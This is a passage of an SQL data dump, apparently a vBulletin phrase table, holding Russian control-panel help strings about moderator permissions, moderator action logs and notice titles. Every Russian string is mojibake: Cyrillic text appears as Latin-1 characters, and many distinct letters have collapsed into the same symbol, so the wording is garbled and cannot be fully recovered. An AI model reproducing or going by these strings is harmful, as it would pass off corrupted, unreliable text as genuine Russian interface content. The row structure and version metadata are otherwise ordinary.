(22738, -1, 'moderator_add_edit_editglobal_canmassmove_text', 'cphelptext', 'Ãîçâîëÿåò ìîäåðà òîðó ìà ññîâî ïåðåìåùà òü òåìû èç ñâîåãî ðà çäåëà .', 'vbulletin', '', 0, ''),
(22739, -1, 'moderator_add_edit_editglobal_canmassmove_title', 'cphelptext', 'Ìîæåò ìà ññîâî ïåðåìåùà òü òåìû', 'vbulletin', '', 0, ''),
(22740, -1, 'moderator_add_edit_editglobal_canmassprune_text', 'cphelptext', 'Ãîçâîëÿåò ìîäåðà òîðó ìà ññîâî óäà ëÿòü òåìû ñâîåãî ðà çäåëà .', 'vbulletin', '', 0, ''),
(22741, -1, 'moderator_add_edit_editglobal_canmassprune_title', 'cphelptext', 'Ìîæåò ìà ññîâî óäà ëÿòü òåìû', 'vbulletin', '', 0, ''),
(22742, -1, 'moderator_add_edit_editglobal_cansetpassword_text', 'cphelptext', 'Åñëè Ãà ðà çäåë óñòà Ãîâëåà ïà ðîëü, ýòà îïöèÿ ïîçâîëèò ìîäåðà òîðó èçìåÃÿòü åãî.', 'vbulletin', '', 0, ''),
(22743, -1, 'moderator_add_edit_editglobal_cansetpassword_title', 'cphelptext', 'Ìîæåò óñòà Ãîâèòü ïà ðîëü Ãà ðà çäåë', 'vbulletin', '', 0, ''),
(22744, -1, 'moderator_add_edit_editglobal_canviewips_text', 'cphelptext', 'Âìåñòå ñ êà æäûì ñîîáùåÃèåì çà ïèñûâà åòñÿ IP à äðåñ òîãî, êòî åãî îñòà âèë. Ãòà îïöèÿ ïîçâîëÿåò ìîäåðà òîðó ïðîñìîòðåòü IP à äðåñ à âòîðà , Ãà æà â Ãà ñîîòâåòñòâóþùóþ èêîÃêó â ñîîáùåÃèè.', 'vbulletin', '', 0, ''),
(22745, -1, 'moderator_add_edit_editglobal_canviewips_title', 'cphelptext', 'Ìîæåò ñìîòðåòü IP-à äðåñ', 'vbulletin', '', 0, ''),
(22746, -1, 'moderator_add_edit_editglobal_canviewprofile_text', 'cphelptext', 'Ãîçâîëÿåò ìîäåðà òîðó âèäåòü ïðîôèëü ïîëüçîâà òåëÿ òà ê æå, êà ê è â ïà Ãåëè à äìèÃèñòðà òîðà . ÎäÃà êî ýòî ÃÃ¥ äà ¸ò ïðà âà ìîäåðà òîðó ðåäà êòèðîâà òü ïðîôèëè ïîëüçîâà òåëåé.', 'vbulletin', '', 0, ''),
(22747, -1, 'moderator_add_edit_editglobal_canviewprofile_title', 'cphelptext', 'Ìîæåò ñìîòðåòü ïðîôèëè ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(22748, -1, 'moderator_add_edit_editglobal_canbanusers_text', 'cphelptext', 'Ãîçâîëÿåò ìîäåðà òîðó áëîêèðîâà òü ïîëüçîâà òåëåé Ãà îïðåäåëåÃÃûé ïåðèîä èëè Ãà âñåãäà .', 'vbulletin', '', 0, ''),
(22749, -1, 'moderator_add_edit_editglobal_canbanusers_title', 'cphelptext', 'Ìîæåò áëîêèðîâà òü ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(22750, -1, 'moderator_add_edit_editglobal_canunbanusers_text', 'cphelptext', 'Ãîçâîëÿåò ìîäåðà òîðó âîññòà Ãà âëèâà òü âîçìîæÃîñòü äîñòóïà ê ôîðóìó çà áëîêèðîâà ÃÃûõ ïîëüçîâà òåëåé.', 'vbulletin', '', 0, ''),
(22751, -1, 'moderator_add_edit_editglobal_canunbanusers_title', 'cphelptext', 'Ìîæåò ðà çáëîêèðîâà òü ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(22752, -1, 'moderator_add_edit_editglobal_caneditsigs_text', 'cphelptext', 'Ãîçâîëÿåò ìîäåðà òîðó èçìåÃÿòü ïîäïèñè ïîëüçîâà òåëåé.', 'vbulletin', '', 0, ''),
(22753, -1, 'moderator_add_edit_editglobal_caneditsigs_title', 'cphelptext', 'Ìîæåò ðåäà êòèðîâà òü ïîäïèñè ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(22754, -1, 'moderator_add_edit_editglobal_caneditavatar_text', 'cphelptext', 'Ãîçâîëÿåò ìîäåðà òîðó èçìåÃÿòü à âà òà ðû ïîëüçîâà òåëåé.', 'vbulletin', '', 0, ''),
(22755, -1, 'moderator_add_edit_editglobal_caneditavatar_title', 'cphelptext', 'Ìîæåò ðåäà êòèðîâà òü à âà òà ðû ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(22756, -1, 'moderator_add_edit_editglobal_caneditprofilepic_text', 'cphelptext', 'Ãîçâîëÿåò ìîäåðà òîðó èçìåÃÿòü ôîòîãðà ôèè â ïðîôèëå ïîëüçîâà òåëåé.', 'vbulletin', '', 0, ''),
(22757, -1, 'moderator_add_edit_editglobal_caneditprofilepic_title', 'cphelptext', 'Ìîæåò ðåäà êòèðîâà òü ôîòîãðà ôèè ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(22758, -1, 'moderator_add_edit_editglobal_caneditreputation_text', 'cphelptext', 'Ãîçâîëÿåò ìîäåðà òîðó èçìåÃÿòü êîììåÃòà ðèè ïîëüçîâà òåëåé ê îöåÃêå ñîîáùåÃèé.', 'vbulletin', '', 0, ''),
(22759, -1, 'moderator_add_edit_editglobal_caneditreputation_title', 'cphelptext', 'Ìîæåò ðåäà êòèðîâà òü ïîëüçîâà òåëüñêèå êîììåÃòà ðèè ðåïóòà öèè', 'vbulletin', '', 0, ''),
(22760, -1, 'moderator_add_edit_editglobal_newthreademail_text', 'cphelptext', 'Ãðè âêëþ÷åÃèè ýòîé îïöèè, ìîäåðà òîð áóäåò îïîâåùà òüñÿ î ñîçäà Ãèè Ãîâîé òåìû ïî ýëåêòðîÃÃîé ïî÷òå. Ãòî ïîëåçÃî äëÿ ðà çäåëîâ, èìåþùèõ Ãèçêóþ à êòèâÃîñòü, Ãî Ãóæäà þùèõñÿ â ñâîåâðåìåÃÃîé ïðîâåðêå.', 'vbulletin', '', 0, ''),
(22761, -1, 'moderator_add_edit_editglobal_newthreademail_title', 'cphelptext', 'Îòïðà âëÿòü ýëåêòðîÃÃîå ïèñüìî ïðè ñîçäà Ãèè Ãîâîé òåìû', 'vbulletin', '', 0, ''),
(22762, -1, 'moderator_add_edit_editglobal_newpostemail_text', 'cphelptext', 'Ãðè âêëþ÷åÃèè ýòîé îïöèè, ìîäåðà òîð áóäåò îïîâåùà òüñÿ î Ãîâîì ñîîáùåÃèè ïî ýëåêòðîÃÃîé ïî÷òå. Ãòî ïîëåçÃî äëÿ ðà çäåëîâ, èìåþùèõ Ãèçêóþ à êòèâÃîñòü, Ãî Ãóæäà þùèõñÿ â ñâîåâðåìåÃÃîé ïðîâåðêå.', 'vbulletin', '', 0, ''),
(22763, -1, 'moderator_add_edit_editglobal_newpostemail_title', 'cphelptext', 'Îòïðà âëÿòü ýëåêòðîÃÃîå ïèñüìî ïðè ðà çìåùåÃèè Ãîâîãî ñîîáùåÃèÿ', 'vbulletin', '', 0, ''),
(22764, -1, 'moderator_add_edit_editglobal_caneditvisitormessages_text', 'cphelptext', 'Ãîçâîëÿåò ìîäåðà òîðó ðåäà êòèðîâà òü \"ïóáëè÷Ãûå ñîîáùåÃèÿ\".', 'vbulletin', 'zCarot', 1195743948, '3.7.0 Beta 1'),
(22765, -1, 'moderator_add_edit_editglobal_caneditvisitormessages_title', 'cphelptext', 'Ìîæåò ðåäà êòèðîâà òü ñîîáùåÃèÿ', 'vbulletin', 'zCarot', 1195743948, '3.7.0 Beta 1'),
(22766, -1, 'moderator_add_edit_editglobal_candeletevisitormessages_text', 'cphelptext', 'Ãîçâîëÿåò ìîäåðà òîðó óäà ëÿòü \"ïóáëè÷Ãûå ñîîáùåÃèÿ\".', 'vbulletin', 'zCarot', 1195743992, '3.7.0 Beta 1'),
(22767, -1, 'moderator_add_edit_editglobal_candeletevisitormessages_title', 'cphelptext', 'Ìîæåò óäà ëÿòü ñîîáùåÃèÿ', 'vbulletin', 'zCarot', 1195743992, '3.7.0 Beta 1'),
(22768, -1, 'moderator_add_edit_editglobal_canremovevisitormessages_text', 'cphelptext', 'Ãîçâîëÿåò ìîäåðà òîðó ôèçè÷åñêè óäà ëÿòü \"ïóáëè÷Ãûå ñîîáùåÃèÿ\" èç áà çû äà ÃÃûõ.', 'vbulletin', 'zCarot', 1195744049, '3.7.0 Beta 1'),
(22769, -1, 'moderator_add_edit_editglobal_canremovevisitormessages_title', 'cphelptext', 'Ìîæåò ôèçè÷åñêè óäà ëèòü ñîîáùåÃèÿ', 'vbulletin', 'zCarot', 1195744049, '3.7.0 Beta 1'),
(22770, -1, 'moderator_add_edit_editglobal_canmoderatevisitormessages_text', 'cphelptext', 'Ãîçâîëÿåò ìîäåðà òîðó äåëà òü \"ïóáëè÷Ãûå ñîîáùåÃèÿ\" âèäèìûìè è Ãåâèäèìûìè.', 'vbulletin', 'zCarot', 1195744118, '3.7.0 Beta 1'),
(22771, -1, 'moderator_add_edit_editglobal_canmoderatevisitormessages_title', 'cphelptext', 'Ìîæåò ïðîâåðÿòü ñîîáùåÃèÿ', 'vbulletin', 'zCarot', 1195744118, '3.7.0 Beta 1'),
(22772, -1, 'moderator_add_edit_editglobal_caneditsocialgroups_text', 'cphelptext', 'Ãîçâîëÿåò ìîäåðà òîðó ðåäà êòèðîâà òü Ãà çâà Ãèå è îïèñà Ãèå ëþáîé ñîöèà ëüÃîé ãðóïïû.', 'vbulletin', 'zCarot', 1195744536, '3.7.0 Beta 1'),
(22773, -1, 'moderator_add_edit_editglobal_caneditsocialgroups_title', 'cphelptext', 'Ìîæåò ðåäà êòèðîâà òü ñîöèà ëüÃûå ãðóïïû', 'vbulletin', 'zCarot', 1195744536, '3.7.0 Beta 1'),
(22774, -1, 'moderator_add_edit_editglobal_candeletesocialgroups_text', 'cphelptext', 'Ãîçâîëÿåò ìîäåðà òîðó óäà ëÿòü ëþáóþ ñîöèà ëüÃóþ ãðóïïó', 'vbulletin', 'zCarot', 1195744591, '3.7.0 Beta 1'),
(22775, -1, 'moderator_add_edit_editglobal_candeletesocialgroups_title', 'cphelptext', 'Ìîæåò óäà ëÿòü ñîöèà ëüÃûå ãðóïïû', 'vbulletin', 'zCarot', 1195744591, '3.7.0 Beta 1'),
(22776, -1, 'moderator_add_edit_editglobal_caneditgroupmessages_text', 'cphelptext', 'Ãîçâîëÿåò ìîäåðà òîðó ðåäà êòèðîâà òü \"ñîîáùåÃèÿ â ãðóïïà õ\".', 'vbulletin', 'zCarot', 1195744660, '3.7.0 Beta 1'),
(22777, -1, 'moderator_add_edit_editglobal_caneditgroupmessages_title', 'cphelptext', 'Ìîæåò ðåäà êòèðîâà òü ñîîáùåÃèÿ', 'vbulletin', 'zCarot', 1195744660, '3.7.0 Beta 1'),
(22778, -1, 'moderator_add_edit_editglobal_candeletegroupmessages_text', 'cphelptext', 'Ãîçâîëÿåò ìîäåðà òîðó óäà ëÿòü \"ñîîáùåÃèÿ â ãðóïïà õ\".', 'vbulletin', 'zCarot', 1197388758, '3.7.0 Beta 1'),
(22779, -1, 'moderator_add_edit_editglobal_candeletegroupmessages_title', 'cphelptext', 'Ìîæåò óäà ëÿòü ñîîáùåÃèÿ', 'vbulletin', 'zCarot', 1197388758, '3.7.0 Beta 1'),
(22780, -1, 'moderator_add_edit_editglobal_canremovegroupmessages_text', 'cphelptext', 'Ãîçâîëÿåò ìîäåðà òîðó ôèçè÷åñêè óäà ëÿòü \"ñîîáùåÃèÿ â ãðóïïà õ\" èç áà çû äà ÃÃûõ.', 'vbulletin', 'zCarot', 1195744823, '3.7.0 Beta 1'),
(22781, -1, 'moderator_add_edit_editglobal_canremovegroupmessages_title', 'cphelptext', 'Ìîæåò ôèçè÷åñêè óäà ëèòü ñîîáùåÃèÿ', 'vbulletin', 'zCarot', 1195744823, '3.7.0 Beta 1'),
(22782, -1, 'moderator_add_edit_editglobal_canmoderategroupmessages_text', 'cphelptext', 'Ãîçâîëÿåò ìîäåðà òîðó äåëà òü \"ñîîáùåÃèÿ â ãðóïïà õ\" âèäèìûìè è Ãåâèäèìûìè.', 'vbulletin', 'zCarot', 1195744928, '3.7.0 Beta 1'),
(22783, -1, 'moderator_add_edit_editglobal_canmoderategroupmessages_title', 'cphelptext', 'Ìîæåò ïðîâåðÿòü ñîîáùåÃèÿ', 'vbulletin', 'zCarot', 1195744928, '3.7.0 Beta 1'),
(22784, -1, 'moderator_add_edit_editglobal_caneditalbumpicture_text', 'cphelptext', 'Ãîçâîëÿåò ìîäåðà òîðó ðåäà êòèðîâà òü ëþáîé \"à ëüáîì\" èëè \"èçîáðà æåÃèå\" Ãà ôîðóìå.', 'vbulletin', 'zCarot', 1195745010, '3.7.0 Beta 1'),
(22785, -1, 'moderator_add_edit_editglobal_caneditalbumpicture_title', 'cphelptext', 'Ìîæåò ðåäà êòèðîâà òü à ëüáîìû / èçîáðà æåÃèÿ', 'vbulletin', 'zCarot', 1195745010, '3.7.0 Beta 1'),
(22786, -1, 'moderator_edit_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå ðåäà êòèðîâà òü ïðà âà ìîäåðà òîðà . Ãèæå - ñïèñîê ïðà â, êîòîðûå ìîæÃî îòðåäà êòèðîâà òü äëÿ ýòîãî ìîäåðà òîðà .', 'vbulletin', '', 0, ''),
(22787, -1, 'moderator_edit_title', 'cphelptext', 'Ãåäà êòèðîâà Ãèå ìîäåðà òîðà ', 'vbulletin', '', 0, ''),
(22788, -1, 'moderator_edit_candeletediscussions_text', 'cphelptext', 'Åñëè \"Äà \", òî ìîäåðà òîð ñìîæåò óäà ëÿòü äèñêóññèè ñîöèà ëüÃûõ ãðóïï.', 'vbulletin', 'zCarot', 1212053681, '3.7.1'),
(22789, -1, 'moderator_edit_candeletediscussions_title', 'cphelptext', 'Ìîæåò óäà ëÿòü äèñêóññèè', 'vbulletin', 'zCarot', 1212053681, '3.7.1'),
(22790, -1, 'moderator_edit_caneditdiscussions_text', 'cphelptext', 'Åñëè \"Äà \", òî ìîäåðà òîð ñìîæåò ðåäà êòèðîâà òü äèñêóññèè ñîöèà ëüÃûõ ãðóïï.', 'vbulletin', 'zCarot', 1212053651, '3.7.1'),
(22791, -1, 'moderator_edit_caneditdiscussions_title', 'cphelptext', 'Ìîæåò ðåäà êòèðîâà òü äèñêóññèè', 'vbulletin', 'zCarot', 1212053598, '3.7.1'),
(22792, -1, 'moderator_edit_canmoderatediscussions_text', 'cphelptext', 'Åñëè \"Äà \", òî ìîäåðà òîð ñìîæåò îòïðà âëÿòü äèñêóññèè Ãà ïðîâåðêó ñîöèà ëüÃûõ ãðóïï.', 'vbulletin', 'zCarot', 1227763171, '3.8.0 Release Candidate 1'),
(22793, -1, 'moderator_edit_canmoderatediscussions_title', 'cphelptext', 'Ìîæåò ïðîâåðÿòü äèñêóññèè', 'vbulletin', 'zCarot', 1212054459, '3.7.1'),
(22794, -1, 'moderator_edit_canremovediscussions_text', 'cphelptext', 'Åñëè \"Äà \", òî ìîäåðà òîð ñìîæåò ôèçè÷åñêè óäà ëÿòü äèñêóññèè ñîöèà ëüÃûõ ãðóïï, òà êèì îáðà çîì èõ Ãåëüçÿ áóäåò âîññòà Ãîâèòü ïîçæå.', 'vbulletin', 'zCarot', 1212053746, '3.7.1'),
(22795, -1, 'moderator_edit_canremovediscussions_title', 'cphelptext', 'Ìîæåò ôèçè÷åñêè óäà ëÿòü äèñêóññèè', 'vbulletin', 'zCarot', 1212053746, '3.7.1'),
(22796, -1, 'moderator_editglobal_candeletediscussions_text', 'cphelptext', 'Åñëè \"Äà \", òî ìîäåðà òîð ñìîæåò óäà ëÿòü äèñêóññèè è âñå ñîîáùåÃèÿ â Ãèõ. Äèñêóññèþ è ñîîáùåÃèÿ ìîæÃî áóäåò âîññòà Ãîâèòü ïîçæå.', 'vbulletin', 'zCarot', 1211465150, '3.7.1'),
(22797, -1, 'moderator_editglobal_candeletediscussions_title', 'cphelptext', 'Ìîæåò óäà ëÿòü äèñêóññèè', 'vbulletin', 'zCarot', 1211464938, '3.7.1'),
(22798, -1, 'moderator_editglobal_caneditdiscussions_text', 'cphelptext', 'Åñëè \"Äà \", òî ìîäåðà òîð ñìîæåò ðåäà êòèðîâà òü ïåðâîå ñîîáùåÃèå â äèñêóññèè, âêëþ÷à ÿ Ãà çâà Ãèå äèñêóññèè.', 'vbulletin', 'zCarot', 1211465192, '3.7.1'),
(22799, -1, 'moderator_editglobal_caneditdiscussions_title', 'cphelptext', 'Ìîæåò ðåäà êòèðîâà òü äèñêóññèè', 'vbulletin', 'zCarot', 1211464959, '3.7.1'),
(22800, -1, 'moderator_editglobal_canmoderatediscussions_text', 'cphelptext', 'Åñëè \"Äà \", òî ìîäåðà òîð ñìîæåò ïðîâåðÿòü äèñêóññèè.', 'vbulletin', 'zCarot', 1212068794, '3.7.1'),
(22801, -1, 'moderator_editglobal_canmoderatediscussions_title', 'cphelptext', 'Ìîæåò ïðîâåðÿòü äèñêóññèè', 'vbulletin', 'zCarot', 1212068794, '3.7.1'),
(22802, -1, 'moderator_editglobal_canremovediscussions_text', 'cphelptext', 'Åñëè \"Äà \", òî ìîäåðà òîð ñìîæåò ôèçè÷åñêè óäà ëÿòü äèñêóññèè è âñå ñîîáùåÃèÿ â Ãèõ èç áà çû äà ÃÃûõ. Äèñêóññèþ è ñîîáùåÃèÿ ÃåâîçìîæÃî áóäåò âîññòà Ãîâèòü!', 'vbulletin', 'zCarot', 1211465113, '3.7.1'),
(22803, -1, 'moderator_editglobal_canremovediscussions_title', 'cphelptext', 'Ìîæåò ôèçè÷åñêè óäà ëÿòü äèñêóññèè', 'vbulletin', 'zCarot', 1211465023, '3.7.1'),
(22804, -1, 'moderator_editglobal_cantransfersocialgroups_text', 'cphelptext', 'Åñëè \"Äà \", òî ìîäåðà òîð ñìîæåò ïåðåäà âà òü óïðà âëåÃèå ëþáîé ñîöèà ëüÃîé ãðóïïîé ëþáîìó ïîëüçîâà òåëþ. ÃîìÃèòå, ÷òî ïåðåäà ÷à áóäåò çà âåðøåÃà òîëüêî ñ ñîãëà ñèÿ òîãî, êîìó áóäåò ïðåäëîæåÃî óïðà âëÿòü ãðóïïîé. \r\nÄîïîëÃèòåëüÃî, òåêóùèé óïðà âëÿþùèé ãðóïïîé ïîëó÷èò ëè÷Ãîå ñîîáùåÃèå î òîì, ÷òî óïðà âëåÃèå áûëî ïåðåäà Ãî äðóãîìó ïîëüçîâà òåëþ.', 'vbulletin', 'zCarot', 1221644296, '3.8.0 Alpha 1'),
(22805, -1, 'moderator_editglobal_cantransfersocialgroups_title', 'cphelptext', 'Ìîæåò ïåðåäà âà òü ñîöèà ëüÃûå ãðóïïû', 'vbulletin', 'zCarot', 1221644314, '3.8.0 Alpha 1'),
(22806, -1, 'moderator_remove_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå óäà ëèòü äà ÃÃîãî ìîäåðà òîðà . Ãà æìèòå êÃîïêó \"Äà \" äëÿ ïîäòâåðæäåÃèÿ óäà ëåÃèÿ. Ãòà îïåðà öèÿ Ãåîáðà òèìà .', 'vbulletin', '', 0, ''),
(22807, -1, 'moderator_remove_title', 'cphelptext', 'Óäà ëèòü ìîäåðà òîðà ', 'vbulletin', '', 0, ''),
(22808, -1, 'moderator_removeall_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå îòñòðà Ãèòü ïîëüçîâà òåëÿ îò óïðà âëåÃèÿ âñåìè ðà çäåëà ìè, çà ïîðÿäêîì â êîòîðûõ îà ñëåäèò. Ãà æìèòå êÃîïêó \"Äà \" äëÿ ïîäòâåðæäåÃèÿ îòñòðà ÃÃ¥Ãèÿ.', 'vbulletin', '', 0, ''),
(22809, -1, 'moderator_removeall_title', 'cphelptext', 'Îòñòðà Ãèòü îò âñåõ ðà çäåëîâ', 'vbulletin', '', 0, ''),
(22810, -1, 'moderator_showlist_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå óâèäåòü âñåõ ìîäåðà òîðîâ âà øåãî ôîðóìà , äà òó èõ ïîñëåäÃåãî âèçèòà , ÷òî ïîìîæåò âà ì îïðåäåëèòü Ãåà êòèâÃûõ ìîäåðà òîðîâ. \r\nÃà æìèòå Ãà \"Ãåäà êòèðîâà òü\" ðÿäîì ñ ðà çäåëîì ìîäåðà òîðà , ÷òîáû ðåäà êòèðîâà òü ïðà âà ìîäåðà òîðà â ýòîì ðà çäåëå. Ãà æìèòå Ãà \"Óäà ëèòü\" ðÿäîì ñ ðà çäåëîì ìîäåðà òîðà , ÷òîáû îòñòðà Ãèòü ìîäåðà òîðà îò óïðà âëåÃèÿ ýòèì ðà çäåëîì. Ãà æìèòå Ãà \"Îòñòðà Ãèòü îò âñåõ ðà çäåëîâ\" äëÿ òîãî, ÷òîáû îòñòðà Ãèòü ìîäåðà òîðà îò óïðà âëåÃèÿ âñåìè åãî ðà çäåëà ìè ñðà çó.', 'vbulletin', '', 0, ''),
(22811, -1, 'moderator_showlist_title', 'cphelptext', 'Ãîêà çà òü ìîäåðà òîðîâ', 'vbulletin', '', 0, ''),
(22812, -1, 'modlog_text', 'cphelptext', 'Ñïðà âî÷Ãûå ñòà òüè: \r\nÑòà òèñòèêà \r\nÇà ïèñè äåéñòâèé ïà Ãåëè à äìèÃèñòðà òîðà \r\nÇà ïèñè äåéñòâèé ìîäåðà òîðîâ \r\nÇà ïèñè äåéñòâèé ïëà Ãîâûõ ðà áîò \r\nÇà ïèñè äåéñòâèé ìîäåðà òîðîâ: \r\nÇà ïèñè äåéñòâèé ìîäåðà òîðîâ ïîçâîëÿþò âà ì ïðîñìîòðåòü äåéñòâèÿ, ñîâåðøåÃÃûå âà øèìè ìîäåðà òîðà ìè. Êà æäûé ðà ç, êîãäà ìîäåðà òîð ñîâåðøà åò êà êîå-ëèáî äåéñòâèå Ãà ýòîì ôîðóìå, èÃôîðìà öèÿ î Ãåì çà ïèñûâà åòñÿ. ÃŽÃà âêëþ÷à åò â ñåáÿ èìÿ ìîäåðà òîðà , äà òó, ïðîèçâåäåÃÃîå äåéñòâèå è äîïîëÃèòåëüÃóþ èÃôîðìà öèþ, êîòîðà ÿ çà âèñèò îò ñîâåðøà åìîãî äåéñòâèÿ.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(22813, -1, 'modlog_title', 'cphelptext', 'Î çà ïèñÿõ äåéñòâèé ìîäåðà òîðîâ', 'vbulletin', '', 0, ''),
(22814, -1, 'modlog_choose_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîçâîëÿåò âà ì ïðîñìîòðåòü/óäà ëèòü çà ïèñè äåéñòâèé ìîäåðà òîðîâ. Åñëè ó âà ñ åñòü âîïðîñû ïî êîÃêðåòÃûì îïöèÿì Ãà ýòîé ñòðà Ãèöå, ñìîòðèòå èÃäèâèäóà ëüÃûå ñïðà âêè ïî îïöèÿì.', 'vbulletin', '', 0, ''),
(22815, -1, 'modlog_choose_title', 'cphelptext', 'Ãðîñìîòð/óäà ëåÃèå çà ïèñåé äåéñòâèé ìîäåðà òîðîâ', 'vbulletin', '', 0, ''),
(22816, -1, 'modlog_choose_perpage_text', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî çà ïèñåé, îòîáðà æà åìîå Ãà ñòðà Ãèöó. Åñëè ó âà ñ ìåäëåÃÃîå ñîåäèÃÃ¥Ãèå, ðåêîìåÃäóåòñÿ óñòà Ãà âëèâà òü Ãåáîëüøîå çÃà ÷åÃèå.', 'vbulletin', '', 0, ''),
(22817, -1, 'modlog_choose_perpage_title', 'cphelptext', 'Çà ïèñåé Ãà ñòðà Ãèöó', 'vbulletin', '', 0, ''),
(22818, -1, 'modlog_choose_userid_text', 'cphelptext', 'Åñëè âû õîòèòå ïðîñìîòðåòü/óäà ëèòü çà ïèñè äåéñòâèé, ñîâåðøåÃÃûõ îäÃèì ìîäåðà òîðîì, óêà æèòå çäåñü åãî èìÿ.', 'vbulletin', '', 0, ''),
(22819, -1, 'modlog_choose_userid_title', 'cphelptext', 'Ãîêà çà òü äåéñòâèÿ, ñîâåðøåÃÃûå òîëüêî', 'vbulletin', '', 0, ''),
(22820, -1, 'modlog_choose_orderby_text', 'cphelptext', 'ÌîæÃî ñîðòèðîâà òü çà ïèñè ïî äà òå ñîâåðøåÃèÿ äåéñòâèÿ, èñïîëüçîâà ÃÃîìó ñêðèïòó èëè ïî èìåÃè ïîëüçîâà òåëÿ, ñîâåðøèâøåãî äåéñòâèå.', 'vbulletin', '', 0, ''),
(22821, -1, 'modlog_choose_orderby_title', 'cphelptext', 'Ñîðòèðîâêà ïî', 'vbulletin', '', 0, ''),
(22822, -1, 'modlog_choose_daysprune_text', 'cphelptext', 'Âû ìîæåòå óäà ëÿòü ñòà ðûå çà ïèñè, èñïîëüçóÿ ýòó îïöèþ. Çà ïèñè, ñäåëà ÃÃûå ðà Ãåå óêà çà ÃÃîé äà òû, áóäóò óäà ëåÃû.', 'vbulletin', '', 0, ''),
(22823, -1, 'modlog_choose_daysprune_title', 'cphelptext', 'Óäà ëèòü çà ïèñè ñòà ðøå, ÷åì (äÃåé)', 'vbulletin', '', 0, ''),
(22824, -1, 'modlog_prunelog_text', 'cphelptext', 'Ãòî ïîäòâåðæäåÃèå òîãî, ÷òî âû æåëà åòå óäà ëèòü óêà çà ÃÃûå çà ïèñè äåéñòâèé ìîäåðà òîðà . Ãà æìèòå Ãà êÃîïêó \"Äà \" äëÿ ïîäòâåðæäåÃèÿ óäà ëåÃèÿ.', 'vbulletin', '', 0, ''),
(22825, -1, 'modlog_prunelog_title', 'cphelptext', 'Óäà ëèòü çà ïèñè äåéñòâèé ìîäåðà òîðîâ', 'vbulletin', '', 0, ''),
(22826, -1, 'modlog_view_text', 'cphelptext', 'Ãòà ñòðà Ãèöà îòîáðà æà åò ÷à ñòü çà ïèñåé äåéñòâèé, ñäåëà ÃÃûõ ïðè âûïîëÃÃ¥Ãèè âà øèìè ìîäåðà òîðà ìè ñâîèõ îáÿçà ÃÃîñòåé. Ñëåâà Ãà ïðà âî, êîëîÃêè îáîçÃà ÷à þò: \r\nID çà ïèñè : ýòî ïðîñòî âÃóòðåÃÃèé Ãîìåð, èñïîëüçóåìûé äëÿ êà òà ëîãèçà öèè. \r\nÈìÿ : ýòî èìÿ ìîäåðà òîðà , ñîâåðøèâøåãî ýòî äåéñòâèå. \r\nÄà òà : ýòî äà òà è âðåìÿ ñîâåðøåÃèÿ äåéñòâèÿ. \r\nÄåéñòâèå : ýòî äåéñòâèå, êîòîðîå áûëî ñîâåðøåÃî ìîäåðà òîðîì. \r\nÄîï. èÃôîðìà öèÿ : èñïîëüçóåòñÿ äëÿ Ãåêîòîðûõ äåéñòâèé. Òóò îòîáðà æà åòñÿ äîïîëÃèòåëüÃà ÿ èÃôîðìà öèÿ, Ãà ïðèìåð, çà òðîÃóòûå äåéñòâèåì ðà çäåëû è òåìû. \r\nÅñëè äåéñòâèé áîëüøå, ÷åì ìîæÃî îòîáðà çèòü Ãà îäÃîé ñòðà Ãèöå, òî âÃèçó ñòðà Ãèöû âû ìîæåòå óâèäåòü ññûëêè Ãà ïåðâóþ, ïðåäûäóùóþ, ñëåäóþùóþ è ïîñëåäÃþþ ñòðà Ãèöû. Ãòè êÃîïêè ïîÿâëÿþòñÿ ïðè Ãåîáõîäèìîñòè. Ãà ïðèìåð, åñëè âû Ãà õîäèòåñü Ãà ïåðâîé ñòðà Ãèöå, òî êÃîïêè ïåðåõîäà Ãà ïåðâóþ è ïðåäûäóùóþ ñòðà Ãèöó ÃÃ¥ îòîáðà æà þòñÿ. \r\nÄëÿ âîçâðà ùåÃèÿ Ãà ãëà âÃóþ ñòðà Ãèöó Ãà æìèòå Ãà [Ãåðåçà ïóñê] ââåðõó êà æäîé ñòðà Ãèöû. \r\nÂû ìîæåòå îãðà Ãè÷èòü äîñòóï ê ýòîìó ñêðèïòó âîîáùå, òîëüêî ê ôóÃêöèè óäà ëåÃèÿ èëè òîëüêî ê ôóÃêöèè ïðîñìîòðà (ñì. Îãðà Ãè÷åÃèå äîñòóïà ê çà ïèñÿì äåéñòâèé à äìèÃèñòðà òîðà ).', 'vbulletin', 'zCarot', 1205941732, '3.7.0 Release Candidate 1'),
(22827, -1, 'modlog_view_title', 'cphelptext', 'Ãðîñìîòð çà ïèñåé äåéñòâèé ìîäåðà òîðîâ', 'vbulletin', '', 0, ''),
(22828, -1, 'notice_add_edit_title_text', 'cphelptext', 'Óêà çà ÃÃûé çäåñü çà ãîëîâîê èñïîëüçóåòñÿ òîëüêî â ïà Ãåëè à äìèÃèñòðà òîðà äëÿ áûñòðîãî ïîèñêà è Ãèêîãäà ÃÃ¥ ïîêà çûâà åòñÿ ïîñåòèòåëÿì. \r\n \r\nÇäåñü äîëæåà áûòü ââåä¸à òåêñò Ãà îñÃîâÃîì ÿçûêå âà øåãî ôîðóìà . Åñëè âû æåëà åòå ðà çìåñòèòü èÃôîðìà öèþ Ãà äðóãèõ ÿçûêà õ, êîòîðûå âêëþ÷åÃû Ãà âà øåì ôîðóìå, òî Ãà æìèòå Ãà ññûëêó \"Ãåðåâîäû\".', 'vbulletin', 'zCarot', 1190023671, '3.6.8'),
(22829, -1, 'notice_add_edit_title_title', 'cphelptext', 'Çà ãîëîâîê', 'vbulletin', 'zCarot', 1190023671, '3.6.8'),
